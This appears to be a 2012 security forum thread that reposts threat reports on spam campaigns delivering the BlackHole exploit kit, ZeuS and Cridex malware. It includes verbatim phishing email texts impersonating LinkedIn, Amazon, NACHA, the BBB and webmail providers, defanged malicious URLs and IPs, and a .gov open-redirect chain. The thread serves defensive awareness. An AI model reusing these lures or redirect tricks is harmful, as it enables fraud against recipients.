Sample detection rate for the malicious Java script: – Amazon.html – MD5: a8af3b2fba56a23461f2cc97a7b97830* ... JS/Obfuscus.AACB!tr; Trojan-Downloader.JS.Expack.ael
Once a successful client-side exploitation takes place, the BlackHole Exploit kit drops a malicious PDF file with MD5: 9a22573eb991a3780791a2df9c55ddab* that’s exploiting the CVE-2010-0188 vulnerability."
* https://www.virustotal.com/file/47473a71edeec0f5eb50a5b936cb6dc37f9999e130a65bc5d9e251bdf7c5c353/analysis/1349014600/
File name: Amazon.html
Detection ratio: 20/43
Analysis date: 2012-09-30
___
Spoofed WebEx, PayPal Emails lead to Rogue Flash Update
- http://blog.trendmicro.com/trendlabs-security-intelligence/spoofed-webex-paypal-emails-lead-to-rogue-flash-update/
Oct 16, 2012 - "... Last week, we received two spoofed emails that redirect users to a fake Adobe Flash Player update. These messages use different approaches to lure users into downloading the malicious file update_flash_player.exe (detected as TSPY_FAREIT.SMC).
The first email is disguised as a WebEx email containing an HTM attachment. Once users execute this attachment, they are led to a malicious site hosting TSPY_FAREIT.SMC. Employees may be trick into opening this as it appears to be an alert coming from a business tool they often use...
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2012/10/FakeWebex_email.jpg
The second sample, on the other hand, is a spoofed PayPal email that features transaction details.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2012/10/PayPal_phishingemail.jpg
Curious users who click these details are then directed to the webpage hosting the rogue Flash update file... Once executed, TSPY_FAREIT.SMC drops a variant of the infamous banking malware ZeuS/ZBOT, specifically TSPY_ZBOT.AMM and TSPY_ZBOT.LAG. If you may recall, this malware family is known for its information theft routines. These variants are specifically crafted to steal online banking credentials such as usernames, passwords, and other important account details. These stolen information are then used to initiate transactions without users knowledge or are peddled in the underground market for the right price... The use of WebEx in these spoofed emails is also fishy (phishy?). WebEx is a popular business conference/meeting technology in the corporate world... We believe that the perpetrators of this threat are likely targeting businesses and employees...
Update... We observed a blackhole exploit kit (BHEK) spam run mimicking Facebook notification that leads to the site hosting another rogue Flash Player update (detected as TSPY_FAREIT.AMM) that drops ZeuS/ZBOT variants... expect that such spam runs won’t be fading soon... these attacks are continuing at full speed... users are advised to be continuously extra careful with clicking links on email messages."
:mad::mad:
AplusWebMaster
2012-10-18, 17:59
FYI...
NY Traffic Ticket SPAM / kennedyana .ru
- http://blog.dynamoo.com/2012/10/ny-traffic-ticket-spam-kennedyanaru.html
18 Oct 2012 - "This fake Traffic Ticket spam leads to malware on kennedyana .ru:
Date: Wed, 17 Oct 2012 03:59:44 +0600
From: sales1@[redacted]
To: [redacted]
Subject: Fwd: NY TRAFFIC TICKET
New-York Department of Motor Vehicles
TRAFFIC TICKET
NEW-YORK POLICE DEPARTMENT
THE PERSON CHARGED AS FOLLOWS
Time: 5:16 AM
Date of Offense: 21/01/2012
SPEED OVER 50 ZONE
TO PLEAD CLICK HERE AND FILL OUT THE FORM
The malicious payload is on [donotclick]kennedyana .ru:8080/forum/links/column.php hosted on the following IPs:
68.67.42.41 (Fibrenoire, Canada)
72.18.203.140 (Las Vegas NV Datacenter, US)
203.80.16.81 (MYREN, Malaysia) ..."
___
Fake Intuit 'Payroll Confirmation inquiry’ emails lead to the BlackHole exploit kit
- http://blog.webroot.com/2012/10/18/intuit-payroll-confirmation-inquiry-themed-emails-lead-to-the-black-hole-exploit-kit/
Oct 18, 2012 - "...two consecutive massive email campaigns, impersonating Intuit Payroll’s Direct Deposit Service system, in an attempt to trick end and corporate users into clicking on the malicious links found in the mails. Upon clicking on -any- of links found in the emails, users are exposed to the client-side exploits served by the latest version of the BlackHole exploit kit...
Sample screenshot of the first spamvertised campaign:
> https://webrootblog.files.wordpress.com/2012/10/intuit_spam_exploits_black_hole_exploit_kit.png
Upon clicking on the links found in the malicious emails, users are exposed to the following bogus “Page loading…” screen:
> https://webrootblog.files.wordpress.com/2012/10/intuit_spam_exploits_black_hole_exploit_kit_01.png
Screenshots of the second spamvertised campaign:
> https://webrootblog.files.wordpress.com/2012/10/intuit_spam_exploits_black_hole_exploit_kit_02.png
... Both of these malicious domains use to respond to 183.81.133.121; 195.198.124.60; 203.91.113.6. More malicious domains part of the campaign’s infrastructure are known to have responded to the same IPs... Detection rate, MD5: 5723f92abf257101be20100e5de1cf6f * ... Gen:Variant.Kazy.96378; Worm.Win32.Cridex.js, MD5: 06c6544f554ea892e86b6c2cb6a1700c ** ... Trojan.Win32.Buzus.mecu; Worm:Win32/Cridex.B..."
* https://www.virustotal.com/file/64e1ae655aafcf83717cb6b678fa2c36d7cfea2f5bc46dcf56d03f280f024bb3/analysis/
File name: contacts.exe
Detection ratio: 17/43
Analysis date: 2012-09-29
** https://www.virustotal.com/file/ee305b8e80ca0e06147909080435a9eec04532d3054e76102dd6750ef132d907/analysis/
File name: virussign.com_06c6544f554ea892e86b6c2cb6a1700c.exe
Detection ratio: 33/43
Analysis date: 2012-10-19
___
Adbobe CS4 SPAM / leprasmotra .ru
- http://blog.dynamoo.com/2012/10/adbobe-cs4-spam-leprasmotraru.html
18 Oct 2012 - "This fake Adobe spam leads to malware on leprasmotra.ru:
Date: Thu, 18 Oct 2012 10:00:26 -0300
From: "service@paypal.com" [service@paypal.com]
Subject: Order N04833
Good morning,
You can download your Adobe CS4 License here -
We encourage you to explore its new and enhanced capabilities with these helpful tips, tutorials, and eSeminars.
Thank you for buying Adobe InDesign CS4 software.
Adobe Systems Incorporated
The malicious payload is at [donotclick]leprasmotra .ru:8080/forum/links/column.php hosted on:
72.18.203.140 (Las Vegas NV Datacenter, US)
203.80.16.81 (MYREN, Malaysia)
209.51.221.247 (eNET, US)
Blocking access to those IPs is recommended."
___
LinkedIn SPAM / 64.111.24.162
- http://blog.dynamoo.com/2012/10/linkedin-spam-6411124162.html
17 Oct 2012 - "This fake LinkedIn spam leads to malware on 64.111.24.162:
From: LinkedIn.Invitations [mailto:8B44145D0@bhuna.net]
Sent: 17 October 2012 10:06
Subject: New invitation is waiting for your response
Hi [redacted],
User sent you an invitation to connect 6 days ago. How would you like to respond?
Accept Ignore Privately
Alexis Padilla
C.H. Robinson Worldwide (Sales Director)
You are receiving Invitation emails. Unsubscribe.
This email was intended for [redacted].
Learn why we included this.
2012, LinkedIn Corporation. 2029 Stierlin Ct. Mountain View, CA 94043, USA
The malicious payload is at [donotclick]64.111.24.162 /links/assure_numb_engineers.php allocated to Data 102 in the US and then suballocated to:
network:Network-Name:Buzy Bee Hosting /27
network:IP-Network:64.111.24.160/27
network:IP-Network-Block:64.111.24.160 - 64.111.24.191
network:Org-Name:Buzy Bee Hosting
network:Street-Address:1451 North Challenger Dr
network:City:Pueblo West
network:State:CO
network:Postal-Code:81007
network:Country-Code:US
... Blocking the IP (and possibly the /27 block) is probably wise.
___
Amazon.com SPAM / sdqhfckuri .ddns.info and ultjiyzqsh .ddns.info
- http://blog.dynamoo.com/2012/10/amazoncom-spam-sdqhfckuriddnsinfo.html
17 Oct 2012 - "This fake Amazon.com spam leads to malware on sdqhfckuri .ddns.info and ultjiyzqsh .ddns.info:
From: Amazon.Com [mailto:pothooknw@tcsn.net]
Sent: 17 October 2012 06:54
Subject: Your Amazon.com order of "Bulova Men's 94B316 Precisionist Claremont Brown Leather Watch" has shipped!
Importance: High
Gift Cards
| Your Orders
| Amazon.com
Shipping Confirmation
Order #272-3140048-4213404
Hello,
Thank you for shopping with us. We thought you'd like to know that we shipped your gift, and that this completes your order. Your order is on its way, and can no longer be changed. If you need to return an item from this shipment or manage other orders, please visit Your Orders on Amazon.com.
Your estimated delivery date is:
Tuesday, October 9, 2012
Your package is being shipped by UPS and the tracking number is 1ZX305712324670208. Depending on the ship speed you chose, it may take 24 hours for your tracking number to return any information.
Shipment Details
Bulova Men's 94B316 Precisionist Claremont Brown Leather Watch
Sold by Amazon.com LLC (Amazon.com) $109.95
Item Subtotal: $109.95
Shipping & Handling: $0.00
Total Before Tax: $109.95
Shipment Total: $109.95
Paid by Visa: $109.95
Returns are easy. Visit our Online Return Center.
If you need further assistance with your order, please visit Customer Service.
We hope to see you again soon!
Amazon.com
This email was sent from a notification-only address that cannot accept incoming email. Please do not reply to this message.
The malicious payload is at [donotclick]sdqhfckuri .ddns.info/links/calls_already_stopping.php or [donotclick]ultjiyzqsh .ddns.info/links/calls_already_stopping.php hosted on 37.230.117.4 (The First CJSC, Russia).
Added: snfgrhoykdcb.ddns.info and jdrxnlbyweco.ddns.info are also being used in this attack, although it they do not resolve at present.
Blocking .ddns.info and .ddns.name domains will probably not spoil your day. Blocking the 37.230.116.0/23 range might not either..."
___
Take a critical look at DNS blocking...
- http://h-online.com/-1731993
18 Oct 2012
:mad::mad:
AplusWebMaster
2012-10-19, 15:29
FYI...
Fake Facebook direct messages - malware campaign ...
- http://blog.webroot.com/2012/10/19/malware-campaign-spreading-via-facebook-direct-messages-spotted-in-the-wild/
Oct 19, 2012 - "... one of my Facebook friends sent me a direct message indicating that his host has been compromised, and is currently being used to send links to a malicious .zip archive through direct messages to to all of his Facebook friends...
Sample screenshot of the spamvertised direct download link:
> https://webrootblog.files.wordpress.com/2012/10/facebook_direct_message_malware_campaign.png
... All of these redirect to hxxp://74.208.231.61 :81/l.php – tomascloud .com – AS8560... user is exposed to a direct download link of Picture15 .JPG .zip.
Detection rate: MD5: dfe23ad3d50c1cf45ff222842c7551ae * ... Trojan.Win32.Bublik.iez; Worm:Win32/Slenfbot..."
* https://www.virustotal.com/file/a6abebeedd82d3dc8817cfe0efb00f95965248f0b7e07393745af89bcc41dc59/analysis/1349355521/
File name: Picture15-JPG.scr
Detection ratio: 20/43
Analysis date: 2012-10-04 ..."
___
LinkedIn SPAM / cowonhorse .co
- http://blog.dynamoo.com/2012/10/linkedin-spam-cowonhorseco.html
19 Oct 2012 - "This fake LinkedIn spam leads to malware on cowonhorse .co:
From: LinkedIn.Invitations [mailto:4843D050@pes.sau48.org]
Sent: Fri 19/10/2012 10:29
Subject: Invitation
Hi [redacted],
User sent you an invitation to connect 6 days ago. How would you like to respond?
Accept Ignore Privately
Estelle Garrison
Interpublic Group (Executive Director Marketing PPS)
You are receiving Invitation emails. Unsubscribe.
This email was intended for [redacted].
Learn why we included this.
2012, LinkedIn Corporation. 2029 Stierlin Ct. Mountain View, CA 94043, USA
==========
From: LinkedIn.Invitations [mailto:43DD0F0@cankopy.com]
Sent: Fri 19/10/2012 11:39
Subject: New invitation
Hi [redacted],
User sent you an invitation to connect 14 days ago. How would you like to respond?
Accept Ignore Privately
Carol Parks
Automatic Data Processing (Divisional Finance Director)
You are receiving Invitation emails. Unsubscribe.
This email was intended for [redacted].
Learn why we included this.
2012, LinkedIn Corporation. 2029 Stierlin Ct. Mountain View, CA 94043, USA
==========
From: LinkedIn.Invitations [mailto:3A1665D92@leosanches.com]
Sent: Fri 19/10/2012 12:28
Subject: Invitation
Hi [redacted],
User sent you an invitation to connect 6 days ago. How would you like to respond?
Accept Ignore Privately
Rupert Nielsen
O'Reilly Automotive (Head of Non-Processing Infrastructure)
You are receiving Invitation emails. Unsubscribe.
This email was intended for [redacted].
Learn why we included this.
2012, LinkedIn Corporation. 2029 Stierlin Ct. Mountain View, CA 94043, USA
The malicious payload is on [donotclick]cowonhorse .co/links/observe_resources-film.php hosted on 74.91.118.239 (Nuclearfallout Enterprises, US). Nuclearfallout have hosted sites like this several times before..."
___
Fake Friendster emails lead to BlackHole exploit kit
- http://blog.webroot.com/2012/10/19/regarding-your-friendster-password-themed-emails-lead-to-black-hole-exploit-kit/
19 Oct 2012 - "Cybercriminals are currently spamvertising millions of emails, impersonating Friendster, in an attempt to trick its current and prospective users into clicking on a malicious link found in the email. Upon clicking on the link, users are exposed to the client-side exploits served by the latest version of the BlackHole exploit kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/10/friendster_spam_email_social_engineering_malware_exploits_black_hole_exploit_kit.png
... sonatanamore .ru used to respond to the following IPs – 70.38.31.71; 202.3.245.13; 203.80.16.81; 213.251.162.65 ... Sample detection rate for the malicious iFrame loading script: friedster.html – MD5: c444036179aa371aebf9bae3e7cc5eef * ... Exploit.JS.Blacole; Trojan.JS.Iframe.acn
Upon successful client-side exploitation, the campaign drops MD5: 8fa93035ba01238dd7a55c378d1c2e40** on the affected host... Trojan-Ransom.Win32.PornoAsset.aeuz; Worm:Win32/Cridex.E
Upon execution, the sample phones back to 95.142.167.193 :8080/mx/5/A/in..."
* https://www.virustotal.com/file/2d91b913f989e564b59b119728a68256321b28b70feac0655fa2ff27301c8be1/analysis/1349356588/
File name: Friendster.html
Detection ratio: 12/43
Analysis date: 2012-10-04
** https://www.virustotal.com/file/94ffc7b8ac380f0bdb84ec57e3d8f63fedc372b0239f30ede9503b5df35a690d/analysis/
File name: 8fa93035ba01238dd7a55c378d1
Detection ratio: 27/43
Analysis date: 2012-10-05
___
Cisco - Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake UPS Payment Document Attachment E-mail Messages - October 19, 2012
Fake Shipment Notification E-mail Messages - October 19, 2012
Fake Product Quote Request E-mail Messages - October 19, 2012
Fake Changelog E-mail Messages- October 19, 2012
Fake Xerox Scan Attachment E-mail Messages - October 19, 2012
Fake Bill Statement E-mail Messages - October 19, 2012
Fake Bank Transfer Receipt E-mail Messages - October 19, 2012
Fake Payment Slip E-mail Messages - October 19, 2012
Fake Money Transfer Receipt E-mail Messages - October 19, 2012
Fake Purchase Order Confirmation E-mail Messages - October 19, 2012
Fake FedEx Parcel Delivery Failure Notification E-mail Messages - October 19, 2012
Fake Portuguese Health Alert Notification E-mail Messages - October 19, 2012
Fake Payment Slip Confirmation E-mail Message - October 19, 2012 ...
:mad:
AplusWebMaster
2012-10-22, 17:20
FYI... multiple entries - SCAM-SPAM-and PHISH:
SCAM - worthless domain names: tsnetint .com and tsnetint .org
- http://blog.dynamoo.com/2012/10/scam-tsnetintcom-and-tsnetintorg.html
22 Oct 2012 - "Another episode in a long-running domain scam, which attempts to get you to buy worthless domain names by scaremongering. In this case the fake company is called "Kenal investment Co. Ltd" (there are several legitimate firms with a similar name). If you get one of these, ignore it and don't give the scammers any money.
The domains quoted are tsnetint .com and tsnetint .org and the originating IP is 117.27.141.168, all hosted in deepest China.
From: bertram @tsnetint .com
Date: 22 October 2012 06:02
Subject: Confirmation of Registration
(Letter to the President or Brand Owner, thanks)
Dear President,
We are the department of Asian Domain Registration Service in China. Here I have something to confirm with you. We formally received an application on October 19, 2012 that a company claimed Kenal investment Co. Ltd were applying to register "dynamoo" as their Net Brand and some domain names through our firm.
Now we are handling this registration, and after our initial checking, we found the name were similar to your company's, so we need to check with you whether your company has authorized that company to register these names. If you authorized this, we would finish the registration at once. If you did not authorize, please let us know within 7 workdays, so that we could handle this issue better. After the deadline we will unconditionally finish the registration for Kenal investment Co. Ltd. Looking forward to your prompt reply.
Best Regards,
Bertram Hong
Registration Dept.
Office:Tel: 86 2885915586 || Fax: +86 2885912116
Address:9/F Libao building No,62 Kehua North Road,Wuhou District,Chengdu City,China ..."
___
SPAM with .gov URLs
- http://www.symantec.com/connect/blogs/spam-gov-urls
22 Oct 2012 Updated - "Symantec is observing an increase in spam messages containing .gov URLs. A screenshot of a sample message is below:
> https://www.symantec.com/connect/sites/default/files/images/govURL%201.png
Traditionally, .gov URLs have been restricted to government entities. This brings up the question of how spammers are using .gov URLs in spam messages.
The answer is on this webpage:
1.USA.gov is the result of a collaboration between USA.gov and bitly.com, the popular URL shortening service. Now, whenever anyone uses bitly to shorten a URL that ends in .gov or .mil, they will receive a short, trustworthy 1.usa.gov URL in return.
... While this feature has legitimate uses for government agencies and employees, it has also opened a door for spammers. By using an open-redirect vulnerability, spammers were able to set up a 1.usa.gov URL that leads to a spam website.
Using the above example:
[http ://]1.usa .gov/[REMOVED]/Rxpfn9
leads to
[http ://]labor.vermont .gov/LinkClick.aspx?link=http://workforprofit.net/[REMOVED]/?wwvxo
which leads to
[http ://]workforprofit .net/[REMOVED]/?wwvxo
The final spam page is a work-at-home scam website that has been designed to look like a financial news network website:
https://www.symantec.com/connect/sites/default/files/images/govURL%202.png
To add legitimacy to the website, spammers have designed it so that other links, such as the menu bar at the top and other news articles (not shown in the above picture), actually lead to the financial news website that it is spoofing. However, the links in the article all lead to a different website where the spammer tries to make the sale:
> https://www.symantec.com/connect/sites/default/files/images/govURL%203.article%20thumbnail.png
USA.gov provides data created any time anyone clicks on a 1.usa.gov URL (link available on this webpage). Analysis of data from the last seven days shows that this trend began on October 12. As of October 18, 43,049 clicks were made through 1.usa.gov shortened URLs to these spam domains:
consumeroption .net
consumerbiz .net
workforprofit .net
consumeroptions .net
consumerlifenet .net
consumerbailout .net
consumerlifetoday .net
consumerneeds .net
consumerstoday .net
consumerlivestoday .net
> https://www.symantec.com/connect/sites/default/files/images/govURL%204.png
... This chart shows the number of spam clicks made on a daily basis:
> https://www.symantec.com/connect/sites/default/files/images/govURL%205.png
While taking advantage of URL shorteners or an open-redirect vulnerability is not a new tactic, the fact that spammers can utilize a .gov service to make their own links is worrisome. Symantec encourages users to always follow best practices and exercise caution when opening links even if it is a .gov URL."
___
Phish for regular Webmail Accounts
- https://isc.sans.edu/diary.html?storyid=14356
Last Updated: 2012-10-22 - "I was looking through my spam folder today and saw an interesting phish. The phishing email is looking for email account information. Nothing new about that, except this one seemed to have a broad target range. Normally, these types of phishes are sent to .edu addresses not those outside of academia. From the email headers, this one was sent to the Handlers email which is a .org. A non-technical user, like many of my relatives, would probably respond to this. I could see this being successful against regular webmail users of Gmail, Hotmail, etc. especially if the verbiage was changed slightly. It could also be targeting those who may be enrolled in online universities... I have included the email below:
From: University Webmaster <university.m @usa .com>
Date: Fri, Oct 19, 2012 at 9:34 PM
Subject: Webmail Account Owner
To:
Dear Webmail Account Owner,
This message is from the University Webmail Messaging Center to all email account owners.
We are currently carrying out scheduled maintenance,upgrade of our web mail service and we are changing our mail host server,as a result your original password will be reset.
We are sorry for any inconvenience caused.
To complete your webmail email account upgrade, you must reply to this email immediately and provide the information requested below.
---
CONFIRM YOUR EMAIL IDENTITY NOW
E-mail Address:
User Name/ID:
Password:
Re-type Password:
---
Failure to do this will immediately render your email address deactivated from the University Webmail..."
___
"Copies of Policies" SPAM / fidelocastroo .ru
- http://blog.dynamoo.com/2012/10/copies-of-policies-spam-fidelocastrooru.html
22 Oct 2012 - "This spam leads to malware on fidelocastroo .ru:
Date: Mon, 22 Oct 2012 08:05:10 -0500
From: Twitter [c-FG6SPPPCGK63=D8154Z4.8N4-6042f@postmaster.twitter.com]
Subject: RE: Charley - Copies of Policies.
Unfortunately, I cannot obtain electronic copies of the Ocean, Warehouse or EPLI policy.
Here is the Package and Umbrella,
and a copy of the most recent schedule.
Charley HEALY,
The malicious payload is on [donotclick]fidelocastroo .ru:8080/forum/links/column.php hosted on the following IPs:
68.67.42.41 (Fibrenoire, Canada)
79.98.27.9 (Interneto Vizija, Lithunia)
190.10.14.196 (RACSA, Costa Rica)
202.3.245.13 (MANA, French Polynesia)
203.80.16.81 (MYREN, Malaysia)
209.51.221.247 (eNET, US)
Plain list for copy and pasting:
68.67.42.41
79.98.27.9
190.10.14.196
202.3.245.13
203.80.16.81
209.51.221.247
Blocking these IPs should prevent any other attacks on the same server."
:mad:
AplusWebMaster
2012-10-23, 13:35
FYI...
Fake PayPal emails serve malware
- http://blog.webroot.com/2012/10/23/paypal-notification-of-payment-received-themed-emails-serve-malware/
Oct 23, 2012 - "... cybercriminals are currently spamvertising millions of emails impersonating PayPal, in an attempt to trick its users into downloading and executing the malicious attachment found in the legitimate looking email...
Screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/10/paypal_spam_email_malware.png
Detection rate for the malicious archive: MD5: 9c2f2cabf00bde87de47405b80ef83c1 * ... Backdoor.Win32.Androm.fm. Once executed, the sample opens a backdoor on the infected host, allowing cybercriminals to gain complete control over the infected host..."
* https://www.virustotal.com/file/1f5f4cb69a892d0bc2e8d6bf17de2087517a7a336523b44536c9b7385c07d67a/analysis/1350578639/
File name: Notification_payment_08_15_2012.exe
Detection ratio: 39/43
Analysis date: 2012-10-18
___
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake PayPal Account Verification E-mail Messages - October 22, 2012
Fake Payment Confirmation E-mail Messages - October 22, 2012
Fake Picture Link E-mail Messages- October 22, 2012
Fake Portuguese Loan Approval E-mail Messages - October 22, 2012
Malicious Personal Photograph Attachment E-mail Messages - October 22, 2012
Fake UPS Payment Document Attachment E-mail Messages - October 22, 2012
Fake FedEx Parcel Delivery Failure Notification E-mail Messages - October 22, 2012
Fake Changelog E-mail Messages - Updated October 22, 2012
Fake Purchase Order Confirmation E-mail Messages - October 22, 2012...
___
NACHA SPAM / bwdlpjvehrka.ddns .info
- http://blog.dynamoo.com/2012/10/nacha-spam-bwdlpjvehrkaddnsinfo.html
23 Oct 2012 - "This fake NACHA spam leads to malware on bwdlpjvehrka.ddns .info:
Date: Tue, 23 Oct 2012 05:44:05 +0200
From: "noreply@direct.nacha.org"
Subject: Notification about the rejected Direct Deposit payment
Herewith we are informing you, that your most recent Direct Deposit via ACH transaction (#914555512836) was cancelled, due to your current Direct Deposit software being out of date. Please use the link below to enter the secure section of our web site and see the details::
Please contact your financial institution to acquire the new version of the software.
Sincerely yours
ACH Network Rules Department
NACHA | The Electronic Payments Association
13450 Sunrise Valley Drive, Suite 100
Herndon, VA 20171
Phone: 703-561-1100 Fax: 703-787-0996
The malicious payload is at [donotclick]bwdlpjvehrka.ddns .info/links/calls_already_stopping.php hosted on 78.24.222.16 (TheFirst-RU, Russia). Blocking this IP address would be a good move."
___
Intuit SPAM / montrealhotpropertyguide .com
- http://blog.dynamoo.com/2012/10/intuit-spam-montrealhotpropertyguidecom.html
23 Oct 2012 - "This fake Intuit spam leads to malware on montrealhotpropertyguide .com:
Date: Tue, 23 Oct 2012 14:45:14 +0200
From: "Intuit QuickBooks Customer Service" [35378B458 @aubergedesbichonnieres .com]
Subject: Intuit QuickBooks Order
Dear [redacted],
Thank you for placing an order with Intuit QuickBooks!
We have received your payment information and it is currently being processed.
ORDER INFORMATION
Order #: 366948851674
Order Date: Oct 22, 2012
[ View order ]
Qty Item Price
1 Intuit QuickBooks Pro Download 2 2012 $183.96***
Subtotal:
Sales Tax:
Total for this Order: $183.96 $0.00 $183.96
*Appropriate credit will be applied to your account.
Please Note: Sales tax calculations are estimated. The final sales tax calculation will comply with local regulations.
NEED HELP?
Questions about your order? Please visit Customer Service.
Join Us On Facebook
Close More Sales
Save Time
Privacy | Legal | Contact Us | About Intuit
You have received this business communication as part of our efforts to fulfill your request or service your account. You may receive this and other business communications from us even if you have opted out of marketing messages.
If you receive an email message that appears to come from Intuit but that you suspect is a phishing email, please forward it immediately to spoof @intuit .com. Please visit http ://security.intuit .com/ for additional security information.
Please note: This email was sent from an auto-notification system that cannot accept incoming email. Please do not reply to this message.
� 2012 Intuit Inc. or its affiliates. All rights reserved.
The malicious payload is on [donotclick]montrealhotpropertyguide .com/links/showed-clearest-about.php hosted on 64.111.26.15 (Data 102, US)."
:mad:
AplusWebMaster
2012-10-24, 15:43
FYI... multiple entries:
iPad SCAM ...
- http://www.gfi.com/blog/twitter-dm-lures-recipients-to-ipad-scam/
Oct 24, 2012 - "We have been reading reports of malware and phishing attacks by means of suspicious direct messages to get user systems infected or have user information and credentials stolen, a ploy that is fast becoming common in the Twittersphere now more than ever. One GFI Labs blog reader gave us the heads up on the latest DM currently making rounds on Twitter. The message says:
did you see your pics with her facebook(dot)com/45569965114786…
Users who click the embedded link are led to a Facebook app page, which then executes a PHP script—
> http://www.gfi.com/blog/wp-content/uploads/2012/10/05-background-traffic.png
... —before redirecting them to this:
> http://www.gfi.com/blog/wp-content/uploads/2012/10/01-fake-facebook-event-page-300x181.jpg
It appears to be a genuine Facebook event page; however, the URL has made obvious that it’s not at all related to the said social networking site.
Depending on where users are in the US and UK, they are led to either a survey scam page or a phishing page once they click - Click here.:
> http://www.gfi.com/blog/wp-content/uploads/2012/10/02-ipad-survey-scam-300x222.jpg
...
> http://www.gfi.com/blog/wp-content/uploads/2012/10/03-phishing-page-300x285.png
... Others are redirected to this ad campaign page we’re probably familiar with:
> http://www.gfi.com/blog/wp-content/uploads/2012/10/04-generic-ad-campaign-page-300x201.png
We have determined that more than 4,500 Internet users have visited the dodgy Facebook app page; however, it is unclear how many have fallen victim to these scams... quick reminder to our readers: think before you click..."
___
Contract SPAM / fidelocastroo .ru
- http://blog.dynamoo.com/2012/10/contract-spam-fidelocastrooru.html
24 Oct 2012 - "This fake contact spam leads to malware on fidelocastroo .ru:
Date: Tue, 23 Oct 2012 12:33:51 -0800
From: "Wilburn TIMMONS" [HIWilburn@hotmail.com]
Subject: Fw: Contract from Wilburn
Attachments: Contract_Scan_DS23656.htm
Hello,
In the attached file I am transferring you the Translation of the Job Contract that I have just received today. I am really sorry for the delay.
Best regards,
Wilburn TIMMONS, secretary
The .htm attachment contains obfuscated javascript that attempts to direct the visitor to a malicious [donotclick]fidelocastroo .ru:8080/forum/links/column.php. This domain name has been used in several recent attacks and is currently multihomed on some familiar IP addresses:
202.3.245.13 (President of French Polynesia*)
203.80.16.81 (MYREN, Malaysia)
209.51.221.247 (eNet, US)
* http://blog.dynamoo.com/2012/10/president-of-french-polynesia.html ..."
___
Bogus Windows License SPAM - in the Wild
- http://www.gfi.com/blog/bogus-windows-license-spam-is-in-the-wild/
Oct 24, 2012 - "... Below is a screenshot of a new spam run in the wild... presents to recipients a very suspicious but very free license for Microsoft Windows that they can download. Sounds too good to be true? It probably is.
> http://www.gfi.com/blog/wp-content/uploads/2012/10/01-MSWindowsLic_1022-300x124.png
From: {random email address}
Subject: Re: Fwd: Order N [redacted]
Message body:
Welcome,
You can download your Microsoft Windows License here -
Microsoft Corporation
Clicking the hyperlinked text leads recipients to a number of .ru websites hosting the file, page2.htm (screenshot below), which contains obfuscated JavaScript code that loads the Web page fidelocastroo(dot)ru(colon)8080/forums/links/column(dot)php.
> http://www.gfi.com/blog/wp-content/uploads/2012/10/02-blackhole-300x83.png
This spam is a launchpad for a Blackhole-Cridex attack on user systems. This method is likewise being used by the most recent campaign of the “Copies of Policies” spam*, also in the wild..."
* http://gfisoftware.tumblr.com/tagged/Copies-of-Policies
___
Wire Transfer SPAM / ponowseniks .ru
- http://blog.dynamoo.com/2012/10/wire-transfer-spam-ponowseniksru.html
24 Oct 2012 - "This fake wire transfer spam leads to malware on ponowseniks .ru:
Date: Wed, 24 Oct 2012 04:26:12 -0500
From: FedEx [info@emails.fedex.com]
Subject: Re: Fwd: Wire Transfer Confirmation (FED REFERENCE 9649AA02)
Attachments: Report_Trans99252.htm
Dear Bank Operator,
WIRE TRANSFER: FEDW-30126495944197210
STATUS: REJECTED
You can find details in the attached file. (Internet Explorer format)
The .htm attachment attempts to redirect the user to a malicious page at [donotclick]ponowseniks .ru:8080/forum/links/column.php hosted on some familar IP addresses:
202.3.245.13 (President of French Polynesia)
203.80.16.81 (MYREN, Malaysia)
209.51.221.247 (eNet, US)"
___
BBB SPAM / samplersmagnifyingglass .net
- http://blog.dynamoo.com/2012/10/bbb-spam-samplersmagnifyingglassnet.html
24 Oct 2012 - "This fake BBB spam leads to malware on samplersmagnifyingglass .net:
Date: Wed, 24 Oct 2012 22:10:18 +0430
From: "Better Business Bureau" [noreply@bbb.org]
Subject: Better Business Beareau Appeal #42790699
Attention: Owner/Manager
Here with the Better Business Bureau notifies you that we have been sent a claim (ID 42790699) from one of your consumers about their dealership with you.
Please view the CLAIMS REPORT down to view more information on this problem and suggest us about your point of view as soon as possible.
On a website above please enter your complain id: 42790699 to review it.
We are looking forward to hearing from you.
-----------------------------------
Faithfully,
Rebecca Wilcox
Dispute advisor
Better Business Bureau
The malicious payload is on [donotclick]samplersmagnifyingglass .net/detects/confirming_absence_listing.php hosted on 183.81.133.121, a familiar IP address belonging to Vodafone in Fiji that has been used several times before and is well worth blocking."
:mad: :mad:
AplusWebMaster
2012-10-25, 15:12
FYI... multiple entries:
Fake UPS emails serve malware ...
- http://blog.webroot.com/2012/10/25/your-ups-invoice-is-ready-themed-emails-serve-malware/
Oct 25, 2012 - "... cybercriminals launched yet another massive spam campaign, impersonating the United Parcel Service (UPS), in an attempt to trick its current and prospective customers into downloading and executing the malicious attachment found in the email. Upon execution, the malware opens a backdoor on the infected host, allowing the cybercriminals behind the campaign to gain complete control over the victim’s host...
Screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/10/ups_spam_email_malware.png
Detection rate for the malicious attachment: MD5: 0e78d3704332c59b619f872fd6d33d25 * ... Trojan-Downloader.Win32.Andromeda.qw.
* https://www.virustotal.com/file/d9e1ea5146c93c69836c0d8d430ab99519032228af9da5c6d0c1d295c3f07a5d/analysis/1350581761/
File name: UPS_Delivery_Confirmation.pdf.exe
Detection ratio: 32/43
Analysis date: 2012-10-18
___
Fake Facebook emails lead to malware
- https://www.net-security.org/malware_news.php?id=2302
25.10.2012 - "If you receive an email seemingly sent by Facebook, sharing an offensive comment that has seemingly been left on your Wall by an unknown user, please don't be tempted to follow the link.
> https://www.net-security.org/images/articles/fb-offensive-scam.jpg
... If you do, you'll be -redirected- to a -fake- Facebook page hosting a malicious iFrame script that triggers the infamous Blackhole exploit kit, and if it finds a vulnerability to exploit, you will be automatically saddled with some or other malicious software. The attackers will try to hide the fact by automatically redirecting you to another legitimate Facebook page, belonging to a Facebook users that, according to Sophos*, does not seem to be related to the attack."
* http://nakedsecurity.sophos.com/2012/10/24/offensive-facebook-email-leads-to-blackhole-malware-attack/
___
ADP SPAM / openpolygons .net
- http://blog.dynamoo.com/2012/10/adp-spam-openpolygonsnet.html
